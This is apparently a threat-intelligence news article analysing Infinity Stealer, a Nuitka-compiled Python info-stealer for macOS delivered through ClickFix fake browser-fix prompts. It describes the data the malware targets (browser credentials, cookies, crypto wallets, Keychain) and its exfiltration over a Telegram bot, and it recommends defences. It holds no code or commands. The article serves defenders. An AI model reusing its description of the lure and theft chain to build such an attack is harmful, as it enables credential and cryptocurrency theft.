Infinity Stealer macOS Malware: Analyzing ClickFix Lures and Payloads
- [01] Immediate impact: MacOS users face credential and cryptocurrency theft from a new Python-based info-stealer distributed via deceptive browser update prompts.
- [02] Affected systems: The malware targets macOS systems, specifically exfiltrating data from Chromium-based browsers, cryptocurrency wallets, and the system Keychain.
- [03] Remediation: Deploy advanced endpoint detection rules to block unauthorized Python execution and educate users against running scripts from untrusted browser pop-ups.
A newly identified Phishing campaign is targeting macOS users with a sophisticated info-stealer dubbed Infinity Stealer. This malware, according to BleepingComputer, leverages the increasingly popular ClickFix technique to deceive users into executing malicious scripts under the guise of browser repairs or certificate updates.
Technical Analysis of Nuitka-compiled Python Malware Detection
Infinity Stealer is developed in Python and converted into a standalone Mach-O executable using Nuitka, an open-source compiler that translates Python code into C++ before compiling it. This method provides several advantages for threat actors, primarily in obfuscating the underlying source code and complicating the reverse engineering process. Security professionals who aim to detect Infinity Stealer macOS malware must look beyond traditional script-based detection, as the Nuitka-compiled binary behaves differently than a standard Python interpreter execution.
The malware’s execution chain typically begins when a user encounters a compromised or malicious website. These sites display fake error messages—often claiming a browser or security certificate has failed—and provide a set of instructions to ‘fix’ the issue. This often involves copying a PowerShell or Terminal command to the clipboard and executing it manually. In the case of macOS, this command downloads and executes the Infinity Stealer payload.
This specific TTP exploits user trust and bypasses many automated browser protections by shifting the execution burden to the victim. For defenders, identifying Nuitka-compiled Python malware detection patterns requires monitoring for specific metadata within Mach-O files and observing suspicious child processes spawned from Terminal or other shell environments. The MITRE ATT&CK framework classifies this under User Execution (T1204), highlighting the social engineering component of the threat.
Data Exfiltration and C2 Communication
Once active, Infinity Stealer performs extensive reconnaissance of the host system. It utilizes the native system_profiler utility to gather hardware details, OS version, and processor information. Its primary objective, however, is the theft of sensitive data stored within applications. The malware targets various Chromium-based browsers, including Google Chrome, Brave, Microsoft Edge, and Opera, to exfiltrate:
- Login credentials and saved passwords.
- Browser cookies and session tokens.
- Credit card information stored in autofill settings.
Beyond browser data, Infinity Stealer specifically targets cryptocurrency wallets and decentralized application extensions. It also attempts to extract data from the macOS Keychain, Telegram session files, and Discord tokens. All harvested data is bundled and exfiltrated to a C2 server, which in this instance is managed via a Telegram bot API. This use of legitimate communication platforms for data exfiltration allows the traffic to blend in with normal network activity, potentially evading detection by standard network monitoring tools.
Defense and Mitigation Strategies
To effectively prevent ClickFix browser update social engineering attacks, organizations must adopt a multi-layered defense strategy. Because these attacks rely on human interaction, security awareness training is a vital component. Users should be educated on the risks of copying and pasting commands from websites into their system shell, regardless of how official the prompt appears.
From a technical perspective, the SOC should prioritize the implementation of EDR policies that restrict or alert on the execution of Python binaries in non-developer environments. Integrating IoC feeds into existing SIEM platforms will help identify known malicious domains and IP addresses associated with the ClickFix infrastructure. Furthermore, organizations should consider application whitelisting to ensure that only verified and signed binaries can execute on macOS endpoints, effectively neutralizing the threat posed by unsigned or ad-hoc compiled Nuitka binaries.
Advertisement